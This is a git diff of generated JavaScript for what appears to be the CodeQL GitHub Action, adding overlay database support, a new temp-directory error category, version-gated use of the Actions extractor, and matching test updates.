//# sourceMappingURL=api-client.test.js.map
|
//# sourceMappingURL=api-client.test.js.map
|
||||||
File diff suppressed because one or more lines are too long
@@ -1 +1 @@
|
|||||||
{ "maximumVersion": "3.16", "minimumVersion": "3.12" }
|
{ "maximumVersion": "3.17", "minimumVersion": "3.12" }
|
||||||
|
|||||||
2
lib/autobuild.js
generated
2
lib/autobuild.js
generated
@@ -123,7 +123,7 @@ async function setupCppAutobuild(codeql, logger) {
|
|||||||
const envVar = feature_flags_1.featureConfig[feature_flags_1.Feature.CppDependencyInstallation].envVar;
|
const envVar = feature_flags_1.featureConfig[feature_flags_1.Feature.CppDependencyInstallation].envVar;
|
||||||
const featureName = "C++ automatic installation of dependencies";
|
const featureName = "C++ automatic installation of dependencies";
|
||||||
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
||||||
if (await features.getValue(feature_flags_1.Feature.CppDependencyInstallation, codeql)) {
|
if (await features.getValue(feature_flags_1.Feature.CppDependencyInstallation, codeql)) {
|
||||||
// disable autoinstall on self-hosted runners unless explicitly requested
|
// disable autoinstall on self-hosted runners unless explicitly requested
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"autobuild.js","sourceRoot":"","sources":["../src/autobuild.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAeA,kEAkGC;AAED,8CAqCC;AAED,oCAsBC;AAhLD,oDAAsC;AAEtC,iDAA6E;AAC7E,6CAAgD;AAChD,qCAA6C;AAE7C,uCAAmC;AACnC,+CAAuC;AACvC,mDAAmE;AACnE,2CAAyD;AAEzD,6CAAkD;AAClD,qDAAgD;AAChD,iCAAwD;AAEjD,KAAK,UAAU,2BAA2B,CAC/C,MAAc,EACd,MAA0B,EAC1B,MAAc;IAEd,IACE,CAAC,MAAM,CAAC,SAAS,KAAK,gBAAS,CAAC,IAAI;QAClC,CAAC,MAAM,MAAM,CAAC,eAAe,CAAC,6BAAY,CAAC,wBAAwB,CAAC,CAAC,CAAC;QACxE,MAAM,CAAC,SAAS,KAAK,gBAAS,CAAC,MAAM,EACrC,CAAC;QACD,MAAM,CAAC,IAAI,CACT,qBAAqB,MAAM,CAAC,SAAS,2BAA2B;YAC9D,OAAO,gBAAM,CAAC,kBAAkB,wBAAwB,CAC3D,CAAC;QACF,OAAO,SAAS,CAAC;IACnB,CAAC;IAED,0CAA0C;IAC1C,mFAAmF;IACnF,oFAAoF;IACpF,4EAA4E;IAC5E,MAAM,kBAAkB,GAAG,MAAM,CAAC,SAAS,CAAC,MAAM,CAAC,CAAC,CAAC,EAAE,EAAE,CACvD,IAAA,4BAAgB,EAAC,CAAC,CAAC,CACpB,CAAC;IAEF,IAAI,CAAC,kBAAkB,EAAE,CAAC;QACxB,MAAM,CAAC,IAAI,CACT,iEAAiE,CAClE,CAAC;QACF,OAAO,SAAS,CAAC;IACnB,CAAC;IAED;;;;;;;;;;;;;;;;;;;;;;;;;;OA0BG;IACH,MAAM,2BAA2B,GAAG,kBAAkB,CAAC,MAAM,CAC3D,CAAC,CAAC,EAAE,EAAE,CAAC,CAAC,KAAK,oBAAQ,CAAC,EAAE,CACzB,CAAC;IAEF,MAAM,SAAS,GAAe,EAAE,CAAC;IACjC,yEAAyE;IACzE,UAAU;IACV,IAAI,2BAA2B,CAAC,CAAC,CAAC,KAAK,SAAS,EAAE,CAAC;QACjD,SAAS,CAAC,IAAI,CAAC,2BAA2B,CAAC,CAAC,CAAC,CAAC,CAAC;IACjD,CAAC;IACD,uEAAuE;IACvE,wCAAwC;IACxC,IAAI,kBAAkB,CAAC,MAAM,KAAK,2BAA2B,CAAC,MAAM,EAAE,CAAC;QACrE,SAAS,CAAC,IAAI,CAAC,oBAAQ,CAAC,EAAE,CAAC,CAAC;IAC9B,CAAC;IAED,MAAM,CAAC,KAAK,CAAC,kBAAkB,SAAS,CAAC,IAAI,CAAC,OAAO,CAAC,GAAG,CAAC,CAAC;IAE3D,2EAA2E;IAC3E,4EAA4E;IAC5E,2CAA2C;IAC3C,uEAAuE;IACvE,2EAA2E;IAC3E,uEAAuE;IACvE,yCAAyC;IACzC,IAAI,2BAA2B,CAAC,MAAM,GAAG,CAAC,EAAE,CAAC;QAC3C,MAAM,CAAC,OAAO,CACZ,oCAAoC,SAAS,CAAC,IAAI,CAChD,OAAO,CACR,8BAA8B,2BAA2B;aACvD,KAAK,CAAC,CAAC,CAAC;aACR,IAAI,CACH,OAAO,CACR,kFAAkF;YACnF,OAAO,gBAAM,CAAC,4BAA4B,wBAAwB,CACrE,CAAC;IACJ,CAAC;IAED,OAAO,SAAS,CAAC;AACnB,CAAC;AAEM,KAAK,UAAU,iBAAiB,CAAC,MAAc,EAAE,MAAc;IACpE,MAAM,MAAM,GAAG,6BAAa,CAAC,uBAAO,CAAC,yBAAyB,CAAC,CAAC,MAAM,CAAC;IACvE,MAAM,WAAW,GAAG,4CAA4C,CAAC;IACjE,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;IAC/C,MAAM,aAAa,GAAG,IAAA,+BAAkB,EACtC,IAAA,0BAAmB,EAAC,mBAAmB,CAAC,CACzC,CAAC;IACF,MAAM,QAAQ,GAAG,IAAI,wBAAQ,CAC3B,aAAa,EACb,aAAa,EACb,IAAA,oCAAqB,GAAE,EACvB,MAAM,CACP,CAAC;IACF,IAAI,MAAM,QAAQ,CAAC,QAAQ,CAAC,uBAAO,CAAC,yBAAyB,EAAE,MAAM,CAAC,EAAE,CAAC;QACvE,yEAAyE;QACzE,IACE,OAAO,CAAC,GAAG,CAAC,oBAAoB,CAAC,KAAK,aAAa;YACnD,OAAO,CAAC,GAAG,CAAC,MAAM,CAAC,KAAK,MAAM,EAC9B,CAAC;YACD,MAAM,CAAC,IAAI,CACT,aAAa,WAAW,sCACtB,IAAA,mCAAoB,GAAE,KAAK,SAAS;gBAClC,CAAC,CAAC,8BAA8B,MAAM,yDAAyD,gBAAM,CAAC,oBAAoB,wBAAwB;gBAClJ,CAAC,CAAC,EACN,EAAE,CACH,CAAC;YACF,IAAI,CAAC,cAAc,CAAC,MAAM,EAAE,OAAO,CAAC,CAAC;QACvC,CAAC;aAAM,CAAC;YACN,MAAM,CAAC,IAAI,CACT,YAAY,WAAW,yCAAyC,MAAM,yCAAyC,gBAAM,CAAC,oBAAoB,wBAAwB,CACnK,CAAC;YACF,IAAI,CAAC,cAAc,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;QACtC,CAAC;IACH,CAAC;SAAM,CAAC;QACN,MAAM,CAAC,IAAI,CAAC,aAAa,WAAW,GAAG,CAAC,CAAC;QACzC,IAAI,CAAC,cAAc,CAAC,MAAM,EAAE,OAAO,CAAC,CAAC;IACvC,CAAC;AACH,CAAC;AAEM,KAAK,UAAU,YAAY,CAChC,MAA0B,EAC1B,QAAkB,EAClB,MAAc;IAEd,MAAM,CAAC,UAAU,CAAC,qCAAqC,QAAQ,OAAO,CAAC,CAAC;IACxE,MAAM,MAAM,GAAG,MAAM,IAAA,kBAAS,EAAC,MAAM,CAAC,SAAS,CAAC,CAAC;IACjD,IAAI,QAAQ,KAAK,oBAAQ,CAAC,GAAG,EAAE,CAAC;QAC9B,MAAM,iBAAiB,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IAC1C,CAAC;IACD,IACE,MAAM,CAAC,SAAS;QAChB,CAAC,MAAM,MAAM,CAAC,eAAe,CAAC,6BAAY,CAAC,wBAAwB,CAAC,CAAC,EACrE,CAAC;QACD,MAAM,MAAM,CAAC,qBAAqB,CAAC,MAAM,EAAE,QAAQ,CAAC,CAAC;IACvD,CAAC;SAAM,CAAC;QACN,MAAM,MAAM,CAAC,YAAY,CAAC,MAAM,EAAE,QAAQ,CAAC,CAAC;IAC9C,CAAC;IACD,IAAI,QAAQ,KAAK,oBAAQ,CAAC,EAAE,EAAE,CAAC;QAC7B,IAAI,CAAC,cAAc,CAAC,oBAAM,CAAC,oBAAoB,EAAE,MAAM,CAAC,CAAC;IAC3D,CAAC;IACD,MAAM,CAAC,QAAQ,EAAE,CAAC;AACpB,CAAC"}
|
{"version":3,"file":"autobuild.js","sourceRoot":"","sources":["../src/autobuild.ts"],"names":[],"mappings":"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"}
|
||||||
4
lib/cli-errors.js
generated
4
lib/cli-errors.js
generated
@@ -110,6 +110,7 @@ function extractAutobuildErrors(error) {
|
|||||||
var CliConfigErrorCategory;
|
var CliConfigErrorCategory;
|
||||||
(function (CliConfigErrorCategory) {
|
(function (CliConfigErrorCategory) {
|
||||||
CliConfigErrorCategory["AutobuildError"] = "AutobuildError";
|
CliConfigErrorCategory["AutobuildError"] = "AutobuildError";
|
||||||
|
CliConfigErrorCategory["CouldNotCreateTempDir"] = "CouldNotCreateTempDir";
|
||||||
CliConfigErrorCategory["ExternalRepositoryCloneFailed"] = "ExternalRepositoryCloneFailed";
|
CliConfigErrorCategory["ExternalRepositoryCloneFailed"] = "ExternalRepositoryCloneFailed";
|
||||||
CliConfigErrorCategory["GradleBuildFailed"] = "GradleBuildFailed";
|
CliConfigErrorCategory["GradleBuildFailed"] = "GradleBuildFailed";
|
||||||
CliConfigErrorCategory["IncompatibleWithActionVersion"] = "IncompatibleWithActionVersion";
|
CliConfigErrorCategory["IncompatibleWithActionVersion"] = "IncompatibleWithActionVersion";
|
||||||
@@ -139,6 +140,9 @@ exports.cliErrorsConfig = {
|
|||||||
new RegExp("We were unable to automatically build your code"),
|
new RegExp("We were unable to automatically build your code"),
|
||||||
],
|
],
|
||||||
},
|
},
|
||||||
|
[CliConfigErrorCategory.CouldNotCreateTempDir]: {
|
||||||
|
cliErrorMessageCandidates: [new RegExp("Could not create temp directory")],
|
||||||
|
},
|
||||||
[CliConfigErrorCategory.ExternalRepositoryCloneFailed]: {
|
[CliConfigErrorCategory.ExternalRepositoryCloneFailed]: {
|
||||||
cliErrorMessageCandidates: [
|
cliErrorMessageCandidates: [
|
||||||
new RegExp("Failed to clone external Git repository"),
|
new RegExp("Failed to clone external Git repository"),
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
45
lib/codeql.js
generated
45
lib/codeql.js
generated
@@ -55,6 +55,7 @@ const environment_1 = require("./environment");
|
|||||||
const feature_flags_1 = require("./feature-flags");
|
const feature_flags_1 = require("./feature-flags");
|
||||||
const git_utils_1 = require("./git-utils");
|
const git_utils_1 = require("./git-utils");
|
||||||
const languages_1 = require("./languages");
|
const languages_1 = require("./languages");
|
||||||
|
const overlay_database_utils_1 = require("./overlay-database-utils");
|
||||||
const setupCodeql = __importStar(require("./setup-codeql"));
|
const setupCodeql = __importStar(require("./setup-codeql"));
|
||||||
const tools_features_1 = require("./tools-features");
|
const tools_features_1 = require("./tools-features");
|
||||||
const tracer_config_1 = require("./tracer-config");
|
const tracer_config_1 = require("./tracer-config");
|
||||||
@@ -133,7 +134,11 @@ async function setupCodeQL(toolsInput, apiDetails, tempDir, variant, defaultCliV
|
|||||||
};
|
};
|
||||||
}
|
}
|
||||||
catch (e) {
|
catch (e) {
|
||||||
throw new Error(`Unable to download and extract CodeQL CLI: ${(0, util_1.getErrorMessage)(e)}${e instanceof Error && e.stack ? `\n\nDetails: ${e.stack}` : ""}`);
|
const ErrorClass = e instanceof util.ConfigurationError ||
|
||||||
|
(e instanceof Error && e.message.includes("ENOSPC")) // out of disk space
|
||||||
|
? util.ConfigurationError
|
||||||
|
: Error;
|
||||||
|
throw new ErrorClass(`Unable to download and extract CodeQL CLI: ${(0, util_1.getErrorMessage)(e)}${e instanceof Error && e.stack ? `\n\nDetails: ${e.stack}` : ""}`);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
/**
|
/**
|
||||||
@@ -250,7 +255,7 @@ async function getCodeQLForCmd(cmd, checkVersion) {
|
|||||||
async supportsFeature(feature) {
|
async supportsFeature(feature) {
|
||||||
return (0, tools_features_1.isSupportedToolsFeature)(await this.getVersion(), feature);
|
return (0, tools_features_1.isSupportedToolsFeature)(await this.getVersion(), feature);
|
||||||
},
|
},
|
||||||
async databaseInitCluster(config, sourceRoot, processName, qlconfigFile, logger) {
|
async databaseInitCluster(config, sourceRoot, processName, qlconfigFile, overlayDatabaseMode, logger) {
|
||||||
const extraArgs = config.languages.map((language) => `--language=${language}`);
|
const extraArgs = config.languages.map((language) => `--language=${language}`);
|
||||||
if (await (0, tracer_config_1.shouldEnableIndirectTracing)(codeql, config)) {
|
if (await (0, tracer_config_1.shouldEnableIndirectTracing)(codeql, config)) {
|
||||||
extraArgs.push("--begin-tracing");
|
extraArgs.push("--begin-tracing");
|
||||||
@@ -258,9 +263,17 @@ async function getCodeQLForCmd(cmd, checkVersion) {
|
|||||||
extraArgs.push(`--trace-process-name=${processName}`);
|
extraArgs.push(`--trace-process-name=${processName}`);
|
||||||
}
|
}
|
||||||
if (config.languages.indexOf(languages_1.Language.actions) >= 0) {
|
if (config.languages.indexOf(languages_1.Language.actions) >= 0) {
|
||||||
extraArgs.push("--search-path");
|
// We originally added an embedded version of the Actions extractor to the CodeQL Action
|
||||||
const extractorPath = path.resolve(__dirname, "../actions-extractor");
|
// itself in order to deploy the extractor between CodeQL releases. When we did add the
|
||||||
extraArgs.push(extractorPath);
|
// extractor to the CLI, though, its autobuild script was missing the execute bit.
|
||||||
|
// 2.20.6 is the first CLI release with the fully-functional extractor in the CLI. For older
|
||||||
|
// versions, we'll keep using the embedded extractor. We can remove the embedded extractor
|
||||||
|
// once 2.20.6 is deployed in the runner images.
|
||||||
|
if (!(await util.codeQlVersionAtLeast(codeql, "2.20.6"))) {
|
||||||
|
extraArgs.push("--search-path");
|
||||||
|
const extractorPath = path.resolve(__dirname, "../actions-extractor");
|
||||||
|
extraArgs.push(extractorPath);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
const codeScanningConfigFile = await generateCodeScanningConfig(config, logger);
|
const codeScanningConfigFile = await generateCodeScanningConfig(config, logger);
|
||||||
const externalRepositoryToken = (0, actions_util_1.getOptionalInput)("external-repository-token");
|
const externalRepositoryToken = (0, actions_util_1.getOptionalInput)("external-repository-token");
|
||||||
@@ -278,10 +291,19 @@ async function getCodeQLForCmd(cmd, checkVersion) {
|
|||||||
const overwriteFlag = (0, tools_features_1.isSupportedToolsFeature)(await this.getVersion(), tools_features_1.ToolsFeature.ForceOverwrite)
|
const overwriteFlag = (0, tools_features_1.isSupportedToolsFeature)(await this.getVersion(), tools_features_1.ToolsFeature.ForceOverwrite)
|
||||||
? "--force-overwrite"
|
? "--force-overwrite"
|
||||||
: "--overwrite";
|
: "--overwrite";
|
||||||
|
if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.Overlay) {
|
||||||
|
const overlayChangesFile = await (0, overlay_database_utils_1.writeOverlayChangesFile)(config, sourceRoot, logger);
|
||||||
|
extraArgs.push(`--overlay-changes=${overlayChangesFile}`);
|
||||||
|
}
|
||||||
|
else if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.OverlayBase) {
|
||||||
|
extraArgs.push("--overlay-base");
|
||||||
|
}
|
||||||
await runCli(cmd, [
|
await runCli(cmd, [
|
||||||
"database",
|
"database",
|
||||||
"init",
|
"init",
|
||||||
overwriteFlag,
|
...(overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.Overlay
|
||||||
|
? []
|
||||||
|
: [overwriteFlag]),
|
||||||
"--db-cluster",
|
"--db-cluster",
|
||||||
config.dbLocation,
|
config.dbLocation,
|
||||||
`--source-root=${sourceRoot}`,
|
`--source-root=${sourceRoot}`,
|
||||||
@@ -293,6 +315,9 @@ async function getCodeQLForCmd(cmd, checkVersion) {
|
|||||||
ignoringOptions: ["--overwrite"],
|
ignoringOptions: ["--overwrite"],
|
||||||
}),
|
}),
|
||||||
], { stdin: externalRepositoryToken });
|
], { stdin: externalRepositoryToken });
|
||||||
|
if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.OverlayBase) {
|
||||||
|
await (0, overlay_database_utils_1.writeBaseDatabaseOidsFile)(config, sourceRoot);
|
||||||
|
}
|
||||||
},
|
},
|
||||||
async runAutobuild(config, language) {
|
async runAutobuild(config, language) {
|
||||||
applyAutobuildAzurePipelinesTimeoutFix();
|
applyAutobuildAzurePipelinesTimeoutFix();
|
||||||
@@ -446,7 +471,6 @@ async function getCodeQLForCmd(cmd, checkVersion) {
|
|||||||
"run-queries",
|
"run-queries",
|
||||||
...flags,
|
...flags,
|
||||||
databasePath,
|
databasePath,
|
||||||
"--expect-discarded-cache",
|
|
||||||
"--intra-layer-parallelism",
|
"--intra-layer-parallelism",
|
||||||
"--min-disk-free=1024", // Try to leave at least 1GB free
|
"--min-disk-free=1024", // Try to leave at least 1GB free
|
||||||
"-v",
|
"-v",
|
||||||
@@ -785,6 +809,13 @@ async function generateCodeScanningConfig(config, logger) {
|
|||||||
if (Array.isArray(augmentedConfig.packs) && !augmentedConfig.packs.length) {
|
if (Array.isArray(augmentedConfig.packs) && !augmentedConfig.packs.length) {
|
||||||
delete augmentedConfig.packs;
|
delete augmentedConfig.packs;
|
||||||
}
|
}
|
||||||
|
augmentedConfig["query-filters"] = [
|
||||||
|
...(config.augmentationProperties.defaultQueryFilters || []),
|
||||||
|
...(augmentedConfig["query-filters"] || []),
|
||||||
|
];
|
||||||
|
if (augmentedConfig["query-filters"]?.length === 0) {
|
||||||
|
delete augmentedConfig["query-filters"];
|
||||||
|
}
|
||||||
logger.info(`Writing augmented user configuration file to ${codeScanningConfigFile}`);
|
logger.info(`Writing augmented user configuration file to ${codeScanningConfigFile}`);
|
||||||
logger.startGroup("Augmented user configuration file contents");
|
logger.startGroup("Augmented user configuration file contents");
|
||||||
logger.info(yaml.dump(augmentedConfig));
|
logger.info(yaml.dump(augmentedConfig));
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
11
lib/codeql.test.js
generated
11
lib/codeql.test.js
generated
@@ -53,6 +53,7 @@ const defaults = __importStar(require("./defaults.json"));
|
|||||||
const doc_url_1 = require("./doc-url");
|
const doc_url_1 = require("./doc-url");
|
||||||
const languages_1 = require("./languages");
|
const languages_1 = require("./languages");
|
||||||
const logging_1 = require("./logging");
|
const logging_1 = require("./logging");
|
||||||
|
const overlay_database_utils_1 = require("./overlay-database-utils");
|
||||||
const setup_codeql_1 = require("./setup-codeql");
|
const setup_codeql_1 = require("./setup-codeql");
|
||||||
const testing_utils_1 = require("./testing-utils");
|
const testing_utils_1 = require("./testing-utils");
|
||||||
const tools_features_1 = require("./tools-features");
|
const tools_features_1 = require("./tools-features");
|
||||||
@@ -335,7 +336,7 @@ const injectedConfigMacro = ava_1.default.macro({
|
|||||||
tempDir,
|
tempDir,
|
||||||
augmentationProperties,
|
augmentationProperties,
|
||||||
};
|
};
|
||||||
await codeqlObject.databaseInitCluster(thisStubConfig, "", undefined, undefined, (0, logging_1.getRunnerLogger)(true));
|
await codeqlObject.databaseInitCluster(thisStubConfig, "", undefined, undefined, overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(true));
|
||||||
const args = runnerConstructorStub.firstCall.args[1];
|
const args = runnerConstructorStub.firstCall.args[1];
|
||||||
// should have used an config file
|
// should have used an config file
|
||||||
const configArg = args.find((arg) => arg.startsWith("--codescanning-config="));
|
const configArg = args.find((arg) => arg.startsWith("--codescanning-config="));
|
||||||
@@ -471,7 +472,7 @@ const injectedConfigMacro = ava_1.default.macro({
|
|||||||
const runnerConstructorStub = stubToolRunnerConstructor();
|
const runnerConstructorStub = stubToolRunnerConstructor();
|
||||||
const codeqlObject = await codeql.getCodeQLForTesting();
|
const codeqlObject = await codeql.getCodeQLForTesting();
|
||||||
sinon.stub(codeqlObject, "getVersion").resolves((0, testing_utils_1.makeVersionInfo)("2.17.6"));
|
sinon.stub(codeqlObject, "getVersion").resolves((0, testing_utils_1.makeVersionInfo)("2.17.6"));
|
||||||
await codeqlObject.databaseInitCluster({ ...stubConfig, tempDir }, "", undefined, "/path/to/qlconfig.yml", (0, logging_1.getRunnerLogger)(true));
|
await codeqlObject.databaseInitCluster({ ...stubConfig, tempDir }, "", undefined, "/path/to/qlconfig.yml", overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(true));
|
||||||
const args = runnerConstructorStub.firstCall.args[1];
|
const args = runnerConstructorStub.firstCall.args[1];
|
||||||
// should have used a config file
|
// should have used a config file
|
||||||
const hasCodeScanningConfigArg = args.some((arg) => arg.startsWith("--codescanning-config="));
|
const hasCodeScanningConfigArg = args.some((arg) => arg.startsWith("--codescanning-config="));
|
||||||
@@ -487,7 +488,7 @@ const injectedConfigMacro = ava_1.default.macro({
|
|||||||
const codeqlObject = await codeql.getCodeQLForTesting();
|
const codeqlObject = await codeql.getCodeQLForTesting();
|
||||||
sinon.stub(codeqlObject, "getVersion").resolves((0, testing_utils_1.makeVersionInfo)("2.17.6"));
|
sinon.stub(codeqlObject, "getVersion").resolves((0, testing_utils_1.makeVersionInfo)("2.17.6"));
|
||||||
await codeqlObject.databaseInitCluster({ ...stubConfig, tempDir }, "", undefined, undefined, // undefined qlconfigFile
|
await codeqlObject.databaseInitCluster({ ...stubConfig, tempDir }, "", undefined, undefined, // undefined qlconfigFile
|
||||||
(0, logging_1.getRunnerLogger)(true));
|
overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(true));
|
||||||
const args = runnerConstructorStub.firstCall.args[1];
|
const args = runnerConstructorStub.firstCall.args[1];
|
||||||
const hasQlconfigArg = args.some((arg) => arg.startsWith("--qlconfig-file="));
|
const hasQlconfigArg = args.some((arg) => arg.startsWith("--qlconfig-file="));
|
||||||
t.false(hasQlconfigArg, "should NOT have injected a qlconfig");
|
t.false(hasQlconfigArg, "should NOT have injected a qlconfig");
|
||||||
@@ -612,7 +613,7 @@ for (const { codeqlVersion, flagPassed, githubVersion, negativeFlagPassed, } of
|
|||||||
sinon.stub(io, "which").resolves("");
|
sinon.stub(io, "which").resolves("");
|
||||||
await t.throwsAsync(async () => await codeqlObject.databaseRunQueries(stubConfig.dbLocation, []), {
|
await t.throwsAsync(async () => await codeqlObject.databaseRunQueries(stubConfig.dbLocation, []), {
|
||||||
instanceOf: cli_errors_1.CliError,
|
instanceOf: cli_errors_1.CliError,
|
||||||
